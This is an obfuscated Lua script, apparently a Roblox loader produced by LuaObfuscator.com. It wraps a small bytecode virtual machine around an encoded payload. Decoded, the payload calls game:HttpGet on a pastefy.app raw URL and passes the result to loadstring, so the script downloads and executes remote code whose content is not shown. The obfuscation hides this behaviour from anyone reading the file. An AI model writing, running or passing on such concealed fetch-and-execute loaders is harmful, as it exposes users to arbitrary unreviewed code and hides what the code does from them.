--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v97=v5(v83,v19);v19=nil;return v97;else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v84-(v84%1) ;else local v85=931 -(857 + 74) ;local v86;while true do if (v85==0) then v86=(570 -(367 + (1078 -(282 + 595))))^(v32-((2565 -(1523 + 114)) -(214 + 713))) ;return (((v31%(v86 + v86))>=v86) and (1 + 0)) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 + 0 ;local v36;local v37;while true do if ((0 -0)==v35) then v36,v37=v1(v16,v18,v18 + ((1046 + 21) -(68 + 997)) );v18=v18 + 2 ;v35=1271 -(226 + 1044) ;end if (v35==(4 -3)) then return (v37 * (373 -(32 + 85))) + v36 ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (351 -(87 + 263)) + 2 );v18=v18 + (961 -(892 + 65)) ;return (v41 * (40022563 -23245347)) + (v40 * (121138 -55602)) + (v39 * (469 -213)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=181 -(67 + 113) ;local v45=(v20(v43,1 -0 ,20) * ((2 + 0)^(78 -46))) + v42 ;local v46=v20(v43,21,23 + 0 + 8 );local v47=((v20(v43,127 -95 )==(953 -(802 + 150))) and  -(2 -1)) or 1 ;if (v46==0) then if (v45==(0 -0)) then return v47 * (0 + 0) ;else v46=998 -(915 + 82) ;v44=0 -0 ;end elseif (v46==((1984 -(368 + 423)) + 854)) then return ((v45==(0 -0)) and (v47 * ((1188 -((3359 -2290) + 118))/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(2237 -1214) ) * (v44 + (v45/(2^(10 + 42)))) ;end local function v25(v48) local v49=18 -(10 + 8) ;local v50;local v51;while true do if (v49==(7 -5)) then v51={};for v90=443 -(341 + 75 + 26) , #v50 do v51[v90]=v2(v1(v3(v50,v90,v90)));end v49=9 -6 ;end if ((2 + 1)==v49) then return v6(v51);end if (v49==(1 -0)) then v50=v3(v16,v18,(v18 + v48) -(439 -((917 -(201 + 571)) + 293)) );v18=v18 + v48 ;v49=432 -(44 + 386) ;end if (v49==(1486 -(998 + 488))) then v50=nil;if  not v48 then v48=v23();if (v48==0) then return "";end end v49=1 + 0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return 0 + 0 ;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v66=(function() return 0 + 0 ;end)();while true do if (v66==(1475 -(1329 + 145))) then if (v52==(972 -(140 + 831))) then v57=(function() return {v54,v55,nil,v56};end)();v58=(function() return v23();end)();v59=(function() return {};end)();for v98= #"}",v58 do local v99=(function() return 718 -(15 + 703) ;end)();local v100=(function() return;end)();local v101=(function() return;end)();while true do if (v99==0) then local v150=(function() return 0 + 0 ;end)();while true do if (v150~=0) then else v100=(function() return v21();end)();v101=(function() return nil;end)();v150=(function() return 439 -(262 + 176) ;end)();end if ((1722 -(345 + 1376))~=v150) then else v99=(function() return 1;end)();break;end end end if (1==v99) then if (v100== #">") then v101=(function() return v21()~=0 ;end)();elseif (v100==(690 -(198 + 490))) then v101=(function() return v24();end)();elseif (v100== #"19(") then v101=(function() return v25();end)();end v59[v98]=(function() return v101;end)();break;end end end v52=(function() return 2;end)();end break;end if (0==v66) then if (v52~=(0 -0)) then else v53=(function() return function(v105,v106,v107) local v108=(function() return 0;end)();local v109=(function() return;end)();while true do if ((0 -0)==v108) then v109=(function() return 0;end)();while true do if (v109~=0) then else local v164=(function() return 0;end)();local v165=(function() return;end)();while true do if (v164==(1206 -(696 + 510))) then v165=(function() return 0 -0 ;end)();while true do if (v165==(1262 -(1091 + 171))) then v105[v106-#"!" ]=(function() return v107();end)();return v105,v106,v107;end end break;end end end end break;end end end;end)();v54=(function() return {};end)();v55=(function() return {};end)();v56=(function() return {};end)();v52=(function() return 1 + 0 ;end)();end if (v52~=(6 -4)) then else v57[ #"91("]=(function() return v21();end)();for v102= #",",v23() do local v103=(function() return v21();end)();if (v20(v103, #"[", #"<")~=0) then else local v143=(function() return 0 -0 ;end)();local v144=(function() return;end)();local v145=(function() return;end)();local v146=(function() return;end)();while true do if (v143==(374 -(123 + 251))) then local v158=(function() return 0 -0 ;end)();while true do if (v158==0) then v144=(function() return v20(v103,2, #"asd");end)();v145=(function() return v20(v103, #"0313",704 -(208 + 490) );end)();v158=(function() return 1;end)();end if (v158==1) then v143=(function() return 1;end)();break;end end end if (v143==(1 + 2)) then if (v20(v145, #"asd", #"-19")== #"~") then v146[ #".com"]=(function() return v59[v146[ #".dev"]];end)();end v54[v102]=(function() return v146;end)();break;end if (v143==(1 + 1)) then if (v20(v145, #",", #"|")~= #"\\") then else v146[838 -(660 + 176) ]=(function() return v59[v146[2]];end)();end if (v20(v145,1 + 1 ,204 -(14 + 188) )== #"\\") then v146[ #"asd"]=(function() return v59[v146[ #"xxx"]];end)();end v143=(function() return 678 -(534 + 141) ;end)();end if (v143~=1) then else local v160=(function() return 0 + 0 ;end)();while true do if (v160~=0) then else v146=(function() return {v22(),v22(),nil,nil};end)();if (v144==0) then local v169=(function() return 0;end)();local v170=(function() return;end)();while true do if (v169~=0) then else v170=(function() return 0;end)();while true do if (v170==(0 + 0)) then v146[ #"19("]=(function() return v22();end)();v146[ #".dev"]=(function() return v22();end)();break;end end break;end end elseif (v144== #",") then v146[ #"-19"]=(function() return v23();end)();elseif (v144==(3 -1)) then v146[ #"91("]=(function() return v23() -((2 -0)^(44 -28)) ;end)();elseif (v144~= #"gha") then else local v176=(function() return 0;end)();local v177=(function() return;end)();while true do if (v176==0) then v177=(function() return 0;end)();while true do if (0==v177) then v146[ #"91("]=(function() return v23() -(2^(9 + 7)) ;end)();v146[ #"asd1"]=(function() return v22();end)();break;end end break;end end end v160=(function() return 1 + 0 ;end)();end if (v160==(397 -(115 + 281))) then v143=(function() return 4 -2 ;end)();break;end end end end end end for v104= #"!",v23() do v55,v104,v28=(function() return v53(v55,v104,v28);end)();end return v57;end v66=(function() return 1;end)();end end end end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[4 -2 ];local v65=v60[10 -7 ];return function(...) local v67=v63;local v68=v64;local v69=v65;local v70=v27;local v71=868 -((2050 -(1408 + 92)) + 317) ;local v72= -(1 -0);local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v87=0 -0 ,v75 do if (v87>=v69) then v73[v87-v69 ]=v74[v87 + (2 -1) ];else v77[v87]=v74[v87 + 1 ];end end local v78=(v75-v69) + (286 -(134 + 151)) ;local v79;local v80;while true do v79=v67[v71];v80=v79[1666 -(970 + 695) ];if ((v80<=(5 -2)) or (4740<=3736)) then if (v80<=(1991 -(582 + 1408))) then if (v80==(0 -0)) then local v110;local v111,v112;local v113;local v114;v77[v79[2]]=v62[v79[(1089 -(461 + 625)) -0 ]];v71=v71 + (3 -2) ;v79=v67[v71];v77[v79[1826 -(1195 + (1917 -(993 + 295))) ]]=v62[v79[3]];v71=v71 + (1 -(0 + 0)) ;v79=v67[v71];v114=v79[243 -(187 + 54) ];v113=v77[v79[783 -(162 + (1789 -(418 + 753))) ]];v77[v114 + 1 + 0 ]=v113;v77[v114]=v113[v79[2 + 1 + 1 ]];v71=v71 + ((1 + 0) -0) ;v79=v67[v71];v77[v79[2 -0 ]]=v79[1 + 2 ];v71=v71 + (1637 -(1373 + 263)) ;v79=v67[v71];v114=v79[1002 -(451 + 549) ];v111,v112=v70(v77[v114](v13(v77,v114 + 1 ,v79[3])));v72=(v112 + v114) -(1 + 0) ;v110=0;for v147=v114,v72 do v110=v110 + 1 ;v77[v147]=v111[v110];end v71=v71 + (1 -0) ;v79=v67[v71];v114=v79[2 -0 ];v77[v114]=v77[v114](v13(v77,v114 + 1 ,v72));v71=v71 + ((406 + 979) -(746 + 638)) ;v79=v67[v71];v77[v79[1 + 1 ]]();v71=v71 + 1 ;v79=v67[v71];do return;end else do return;end end elseif ((v80>(2 -0)) or (3390<=3060)) then v77[v79[343 -(56 + 162 + 123) ]]=v62[v79[(2113 -(406 + 123)) -((3304 -(1749 + 20)) + 46) ]];else v77[v79[2 + 0 + 0 ]]();end elseif (v80<=5) then if (v80==(1 + 3)) then local v131=v79[562 -(306 + (1576 -(1249 + 73))) ];v77[v131]=v77[v131](v13(v77,v131 + 1 + 0 ,v72));else local v133=0 -0 ;local v134;local v135;while true do if ((2455==2455) and (v133==(1467 -(899 + 568)))) then v134=v79[2 + 0 + 0 ];v135=v77[v79[7 -4 ]];v133=(1749 -(466 + 679)) -(268 + (805 -470)) ;end if (1==v133) then v77[v134 + (291 -(60 + 230)) ]=v135;v77[v134]=v135[v79[576 -(426 + 146) ]];break;end end end elseif (v80>(1 + (14 -9))) then local v136=1456 -(282 + 1174) ;local v137;local v138;local v139;local v140;while true do if ((v136==(812 -(569 + 242))) or (999>2693)) then v72=(v139 + v137) -(2 -1) ;v140=0 + 0 ;v136=1026 -(706 + 318) ;end if (v136==(1253 -(721 + 530))) then for v161=v137,v72 do v140=v140 + 1 ;v77[v161]=v138[v140];end break;end if ((463<601) and (v136==(1271 -(945 + 326)))) then v137=v79[4 -2 ];v138,v139=v70(v77[v137](v13(v77,v137 + 1 + 0 ,v79[703 -(271 + 429) ])));v136=1;end end else v77[v79[2 + 0 ]]=v79[3];end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F6351536B764D574A2F72617700083Q00124Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
